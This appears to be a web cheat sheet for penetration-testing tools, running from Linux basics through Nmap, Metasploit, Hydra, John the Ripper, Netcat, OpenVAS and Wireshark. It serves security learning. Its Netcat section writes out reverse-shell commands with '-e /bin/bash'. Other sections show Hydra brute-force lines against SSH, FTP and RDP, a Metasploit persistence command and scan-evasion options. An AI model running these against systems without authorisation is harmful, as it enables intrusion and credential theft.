Master the command-line arsenal for ethical hacking and cybersecurity
Lists files and directories in the current directory.
Example: ls -lah
Shows a detailed view with hidden files in human-readable format.
Used to change the working directory.
Example: cd /home/user/Documents
Moves you to the "Documents" directory.
Displays the current directory you are working in.
Example: pwd
Copies files from one location to another.
Example: cp file.txt /home/user/Backup/
Moves or renames files and directories.
Example: mv file.txt /home/user/Documents/
Removes files or directories.
Example: rm -rf /home/user/OldFiles
Modifies file permissions for the owner, group, and others.
Example: chmod +x script.sh
Changes the ownership of a file or directory.
Example: chown user:group file.sh
Displays or configures network interface parameters.
Example: ifconfig eth0
Pings a target IP or hostname to test network connectivity.
Example: ping 8.8.8.8
Displays network connections, routing tables, and interface statistics.
Example: netstat -anp
Traces the route packets take to a network host.
Example: traceroute google.com
Displays running processes, CPU, and memory usage.
Example: top
Displays information about running processes.
Example: ps aux
Sends a signal to terminate a process.
Example: kill -9 PID
Searches for patterns within files.
Example: grep "error" logfile.txt
Used for pattern-based data extraction and reporting.
Example: awk '{print $1, $3}' logfile.txt
Used to perform basic text transformations.
Example: sed 's/error/success/g' logfile.txt
Automates tasks by combining multiple Linux commands into scripts.
Example:
#!/bin/bash
for ip in $(cat ips.txt); do
ping -c 1 $ip && echo "$ip is up" || echo "$ip is down"
done
Create shortcuts for common commands.
Example: alias ll='ls -lah'
Redirect output to files or use pipes to pass the output of one command as input to another.
Example: grep "error" logfile.txt | tee errors.txt
Use sudo to execute commands as the root user.
Example: sudo apt-get update
These tools allow you to run long tasks in the background or maintain sessions even after disconnecting.
Example: screen -S mysession
Nmap is used to scan a target for open ports and services.
Example: nmap 192.168.1.1
Scan multiple hosts: nmap 192.168.1.1 192.168.1.2
Scan a range of IPs: nmap 192.168.1.1-254
Scan an entire subnet: nmap 192.168.1.0/24
Identifying open ports on a target.
Scan specific ports: nmap -p 22,80 192.168.1.1
Scan a range of ports: nmap -p 1-100 192.168.1.1
Scan all ports: nmap -p- 192.168.1.1
UDP scan: nmap -sU 192.168.1.1
Identifies services running on open ports and their versions.
Service version detection: nmap -sV 192.168.1.1
Aggressive service detection: nmap -A 192.168.1.1
Operating system detection: nmap -O 192.168.1.1
Extend Nmap capabilities with scripts to detect vulnerabilities.
Run default scripts: nmap -sC 192.168.1.1
Run a specific script: nmap --script=http-vuln-cve2017-5638 -p80 192.168.1.1
Run multiple scripts: nmap --script=smb-vuln-*,http-vuln-* 192.168.1.1
Adjust scan speed and stealth.
Fast scan: nmap -T4 192.168.1.1
Stealth scan (SYN): nmap -sS 192.168.1.1
Slow and stealthy scan: nmap -T0 -sS 192.168.1.1
Save scan results for later analysis or reporting.
Save to text file: nmap 192.168.1.1 -oN output.txt
Save in XML format: nmap 192.168.1.1 -oX output.xml
Save in all formats: nmap 192.168.1.1 -oA output
Evade detection and spoof identity during scans.
Scan from a decoy IP: nmap -D 192.168.1.10,192.168.1.11 192.168.1.1
Spoof MAC address: nmap --spoof-mac 00:11:22:33:44:55 192.168.1.1
Fragment packets: nmap -f 192.168.1.1
Maximize your Nmap skills with advanced options.
Use --reason: nmap --reason 192.168.1.1
Find devices behind a firewall: nmap -Pn 192.168.1.1
Before diving into Metasploit commands, it’s crucial to understand its basic components:
Start the Metasploit Console (msfconsole):
Example: msfconsole
Search for exploits relevant to the target system or software:
Example: search vsftpd
Search for a specific CVE:
Example: search cve:2017-0143
Load an exploit into the framework:
Example: use exploit/unix/ftp/vsftpd_234_backdoor
Show available settings for the selected exploit:
Example: show options
Configure options like target IP and payload:
Set target IP: set RHOST 192.168.1.10
Set target port: set RPORT 21
Set payload: set payload linux/x86/meterpreter/reverse_tcp
Launch the exploit with the current configuration:
Example: run or exploit
Examples of payloads:
Reverse TCP: set payload windows/meterpreter/reverse_tcp
Bind shell: set payload windows/shell/bind_tcp
HTTPS payload: set payload windows/meterpreter/reverse_https
Basic commands after gaining a session:
sysinfo: Display system info.getuid: Get user ID of session.shell: Drop to a shell on the target system.download /path/to/file: Download a file from the target.upload /path/to/file: Upload a file to the target.Use multi-handler to manage incoming payload connections:
Example: use exploit/multi/handler
Run auxiliary modules for scanning or gathering info:
Example: use auxiliary/scanner/smb/smb_version
Store scan results and manage hosts:
Connect to DB: db_connect
Nmap scan and store results: db_nmap 192.168.1.0/24
View hosts: hosts
View services: services
Make Meterpreter sessions persistent:
Example: run persistence -U -i 5 -p 4444 -r 192.168.1.5
Automate post-exploitation:
Example: run post/windows/gather/enum_logged_on_users
Nikto scans for well-known vulnerabilities like outdated software versions, default files, or misconfigurations. It uses plugins to extend its scanning capabilities and supports various output formats (text, HTML, XML).
Nikto is pre-installed in pentesting distributions like Kali Linux. Install manually using:
Example: sudo apt install nikto
Scan a web server for vulnerabilities:
Example: nikto -h http://example.com
Scan with SSL: nikto -h https://example.com
Specify the IP address or port for scanning:
Scan an IP: nikto -h 192.168.1.10
Scan a port: nikto -h 192.168.1.10 -p 8080
Narrow down the scan focus using tuning options:
Example: nikto -h example.com -T 123 (Limits scan to file extensions, misconfigurations, and disclosure checks)
Run Nikto through a proxy:
Example: nikto -h http://example.com -useproxy http://proxy-ip:8080
Use specific plugins for scanning:
Example: nikto -h example.com -Plugins "Apache"
Change the User-Agent in HTTP requests:
Example: nikto -h example.com -useragent "Mozilla/5.0"
Throttle the scan rate to avoid overwhelming the server:
Example: nikto -h example.com -delay 2 (Adds a 2-second delay between requests)
Nikto supports multiple output formats:
Text: nikto -h example.com -output results.txt
HTML: nikto -h example.com -Format html -output report.html
CSV: nikto -h example.com -Format csv -output report.csv
Enable verbose output to see detailed HTTP requests and responses:
Example: nikto -h example.com -v
Scan SSL/TLS misconfigurations and vulnerabilities:
Example: nikto -h https://example.com -ssl
Schedule scans with cron jobs or use proxy chains for anonymity:
Example: proxychains nikto -h http://example.com
John the Ripper (often called just "John") is a fast, open-source password-cracking tool. It is widely used for testing weak passwords, recovering lost credentials, or testing password strength in cybersecurity assessments.
Example: John supports various hash types including UNIX, Windows, and web applications.
John is pre-installed in pentesting distributions like Kali Linux, but you can also manually install it.
Example: sudo apt install john for the standard version. Clone from GitHub for the Jumbo version: git clone https://github.com/openwall/john.git
Use John to crack password hashes from files.
Example: john --format=raw-md5 hash.txt to crack an MD5 hash.
John supports many hash formats like MD5, SHA-256, and bcrypt. Use the --format flag to specify the hash type.
Example: john --list=formats to list all supported hash formats.
John can perform dictionary attacks using wordlists. Specify the path to a wordlist with the --wordlist option.
Example: john --wordlist=/path/to/wordlist.txt hash.txt
In incremental mode, John tries all possible combinations of characters to crack the password.
Example: john --incremental hash.txt
Save and resume cracking sessions.
Example: john --session=my_crack hash.txt to save, and john --restore=my_crack to resume.
Use John to crack passwords of files like ZIP archives and PDFs.
Example: Extract ZIP hash: zip2john file.zip > hash.txt then crack: john hash.txt
John is also effective in cracking Windows NTLM hashes.
Example: john --format=NT hash.txt to crack NTLM hashes.
Apply rules to modify passwords in the wordlist (e.g., adding numbers or symbols).
Example: john --wordlist=wordlist.txt --rules hash.txt
Display cracked passwords using the --show option.
Example: john --show hash.txt
John can use GPU acceleration to speed up password cracking.
Example: john --format=raw-md5-opencl hash.txt
Save cracked passwords to an output file.
Example: john --wordlist=wordlist.txt hash.txt --pot=output.txt
Example: Use cron jobs for session automation: 0 3 * * * john --restore=my_crack
Before diving into commands, let's cover some basic terms associated with Hydra:
Hydra is pre-installed in most penetration testing distributions like Kali Linux, but if you need to install it manually, follow these steps:
Installation on Debian-based systems:
sudo apt install hydra
Cloning from Source (if you want the latest version):
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
sudo make install
Hydra's syntax follows a simple pattern:
hydra [options] [target] [protocol]
Options: Flags to define the mode of attack, such as username, password, or wordlists.
Target: The target IP address or hostname.
Protocol: The service you want to attack, such as ssh, ftp, http, etc.
Suppose you want to brute force the FTP service running on 192.168.1.10.
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.10
For SSH services, brute forcing requires more patience as SSH typically blocks repeated attempts quickly.
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.20
This command uses the root username and the rockyou.txt wordlist to attempt brute-forcing the SSH service on 192.168.1.20.
Tuning for SSH:
hydra -t 1 -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.20
Hydra can also be used to crack login forms on websites using HTTP or HTTPS protocols.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.30 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
hydra -l admin -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.40
Hydra supports multithreading to speed up attacks. The -t flag allows you to specify the number of threads to use.
hydra -t 4 -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.10
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt ssh://192.168.1.20
| Protocol | Usage |
|---|---|
| SSH | ssh://target_ip |
| FTP | ftp://target_ip |
| HTTP | http://target_ip/login.php |
| HTTPS | https://target_ip/login.php |
| RDP | rdp://target_ip |
| Telnet | telnet://target_ip |
| MySQL | mysql://target_ip |
| PostgreSQL | postgres://target_ip |
| SMB | smb://target_ip |
Hydra’s output displays login attempts and reveals any successful credentials. After running Hydra, you’ll see something like:
[22][ssh] host: 192.168.1.20 login: admin password: password123
If you need to stop Hydra during a long-running attack and resume it later, Hydra allows you to do so by saving and restoring sessions.
Saving a Session:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.10 -o results.txt
Restoring a Session:
Simply re-run the same command, and Hydra will pick up from where it left off.
Netcat, often referred to as the "Swiss army knife" of networking, is a versatile tool used for various network-related tasks. It allows reading from and writing to network connections using TCP or UDP. Netcat is a go-to tool for creating reverse shells, simple port scanning, banner grabbing, file transfers, and even chatting between systems.
Netcat is usually pre-installed in many Linux distributions, including Kali Linux. However, if you need to install it manually:
sudo apt install netcatsudo yum install ncnc [options] [target] [port]Netcat can act as a client to connect to a server running on a particular port.
nc target_ip portExample:
nc 192.168.1.10 80This opens a connection to 192.168.1.10 on port 80 (HTTP port). You can then interact with the service running on that port (such as sending HTTP requests).
You can use Netcat to create a listener, where Netcat waits for a connection on a specific port.
nc -lvp portExample:
nc -lvp 1234This listens on port 1234 for incoming connections. The -l flag enables listening, -v turns on verbose mode (detailed output), and -p specifies the port.
While Netcat isn’t a dedicated port scanner like Nmap, it can be used for simple port scans to identify open ports on a target.
nc -zv target_ip start_port-end_portExample:
nc -zv 192.168.1.10 20-80-z: Zero I/O mode (just check for open ports, don’t send data).
-v: Verbose mode.
192.168.1.10: Target IP.
20-80: Range of ports to scan.
This command scans ports 20 through 80 on 192.168.1.10, and the results will show which ports are open.
Netcat can be used to grab banners from services running on a particular port, helping to identify the software or version running.
nc target_ip portExample:
nc 192.168.1.10 80Once connected, press Enter a few times, and the server will return the banner (e.g., a web server's version information).
A reverse shell is one of the most powerful features of Netcat. It allows the target system to connect back to your machine, giving you control over it.
nc -lvp 4444nc target_ip 4444 -e /bin/bash-e /bin/bash: Executes /bin/bash (or /bin/sh for simpler shells) on the target machine, allowing command execution.
On the sending machine:
nc target_ip port < filenameExample:
nc 192.168.1.10 1234 < file.txtOn the receiving machine:
nc -lvp 1234 > filenameExample:
nc -lvp 1234 > received_file.txtYou can use Netcat to create a simple chat session between two systems.
nc -lvp 1234nc target_ip 1234Once connected, both systems can type messages that will be displayed on the other machine.
Netcat can be used to manually send HTTP requests to a web server.
nc target_ip 80Once connected, type the HTTP request:
GET / HTTP/1.1
Host: target_ipPress Enter twice, and the server will respond with the web page or an error message.
Netcat allows you to redirect input and output to provide remote access to a shell.
/bin/bash | nc target_ip 1234This redirects the output of /bin/bash to the Netcat session on port 1234.
Netcat can execute commands remotely by creating a pipe between a command and the network connection.
nc target_ip 1234 -e /bin/shThis command executes a shell on the target IP connected through port 1234.
While Netcat is a powerful tool, it can also pose security risks if used maliciously. Ensure you have permission to scan, connect, or interact with the target systems to avoid legal issues.
OpenVAS is pre-installed on Kali Linux. If it’s not, you can install it as follows:
sudo apt update
sudo apt install openvasOnce installed, initialize OpenVAS by running the following command:
sudo gvm-setupThis command will set up the database, scan configurations, and update the vulnerability feed.
Once installed, start the OpenVAS services:
sudo gvm-startOpen your web browser and navigate to the OpenVAS interface, typically available at:
https://localhost:9392Use the admin credentials generated during setup to log in.
Open a web browser and navigate to https://localhost:9392. Log in using your credentials (default username: admin).
Go to Configuration > Targets and create a new target:
Go to Scans > Tasks:
Once the scan is complete, you can view the results under Scans > Reports. OpenVAS will generate a detailed report that includes:
The OpenVAS feed includes the latest NVTs (Network Vulnerability Tests), which are essential for scanning. You should regularly update the feed to ensure that you are scanning for the most recent vulnerabilities:
sudo gvm-feed-updateThis command updates the vulnerability database, adding new CVEs and NVTs.
You can schedule regular scans to automatically run at specific intervals (e.g., daily, weekly) to ensure continuous monitoring:
Credentialed scans provide deeper access to the target system, allowing OpenVAS to check for vulnerabilities that require authentication (e.g., missing patches, weak passwords):
OpenVAS allows you to configure different types of scans based on your needs:
Once a scan is complete, go to Scans > Reports to view detailed reports. Each report provides:
You can export reports in various formats (PDF, HTML, XML) for further analysis or to share with stakeholders:
OpenVAS can be integrated with Metasploit to directly exploit vulnerabilities found in the scan results:
db_import /path/to/openvas_report.xmlWireshark is one of the most powerful and widely used network protocol analyzers. It allows you to capture and inspect data flowing across a network in real-time, enabling network troubleshooting, protocol analysis, and security testing. Wireshark is essential for identifying suspicious traffic and understanding the structure of various network protocols.
Wireshark can be installed using the package manager:
Command: sudo apt updatesudo apt install wireshark
Download Wireshark from the official website and follow the installation instructions.
Open Wireshark. Select the network interface from which you want to capture traffic. Common options include eth0 (Ethernet), wlan0 (WiFi), or lo (Loopback). Click on the Start Capturing button (the shark fin icon) to begin capturing traffic on that interface.
To stop the capture, click on the red Stop button (the square icon).
Common capture filters include:
host 192.168.1.1 (Capture only traffic from a specific IP)
port 80 (Capture traffic to/from a specific port)
tcp (Capture only TCP traffic)
tcp port 80 (Capture only HTTP traffic)
To set a capture filter, click on the Capture Options (gear icon) and enter the filter in the Capture Filter field before starting the capture.
Common display filters include:
http (Show only HTTP traffic)
ip.addr == 192.168.1.1 (Show traffic to/from a specific IP)
tcp.port == 443 (Show TCP traffic to/from a specific port)
dns (Show only DNS queries)
eth.addr == 00:0a:95:9d:68:16 (Show packets with a specific MAC address)
You can enter display filters in the filter bar above the packet list after starting the capture.
Click on a packet from the Packet List. The Packet Details pane will show the protocols involved (e.g., Ethernet, IP, TCP, HTTP). Expand each protocol to inspect its fields (e.g., source/destination IP, TCP flags, HTTP methods).
Right-click on a packet and select Follow > TCP Stream (or UDP stream, based on the protocol). Wireshark will reconstruct the full conversation, making it easier to analyze requests, responses, and the flow of communication.
Wireshark supports an extensive list of network protocols, including:
Use Capture Filters: Capture filters reduce the size of your capture and improve performance by only saving relevant traffic.
Limit Packet Capture Size: Set a packet capture size limit in Capture Options to avoid large files that slow down analysis.
Ring Buffers: Use ring buffers to automatically rotate capture files, preventing a single large file from being created.
Wireshark uses color codes to help you quickly identify different types of traffic:
TCP traffic is typically light purple.
HTTP traffic is typically green.
DNS traffic is typically light blue.
You can customize the color coding by navigating to View > Coloring Rules.
Start/Stop Capture: Ctrl + E
Open Capture File: Ctrl + O
Save Capture File: Ctrl + S
Filter Apply: Enter (after typing in the filter field)
Go to Next Packet: Ctrl + N
Follow Stream: Ctrl + Shift + T
You can export captured packets for later analysis or sharing with others:
Go to File > Export Specified Packets. Choose the format (e.g., pcap, pcapng). Select the range of packets you want to export (all or specific ones).
You can export packet information in plain text or XML:
Go to File > Export Packet Dissections. Choose the format (e.g., plain text, CSV, XML).
Wireshark can help in identifying potential security threats such as:
Common uses for troubleshooting include:
Wireshark is an indispensable tool for network professionals, providing deep insights into network traffic. By mastering its features, you can effectively troubleshoot issues, analyze security vulnerabilities, and enhance your understanding of network protocols.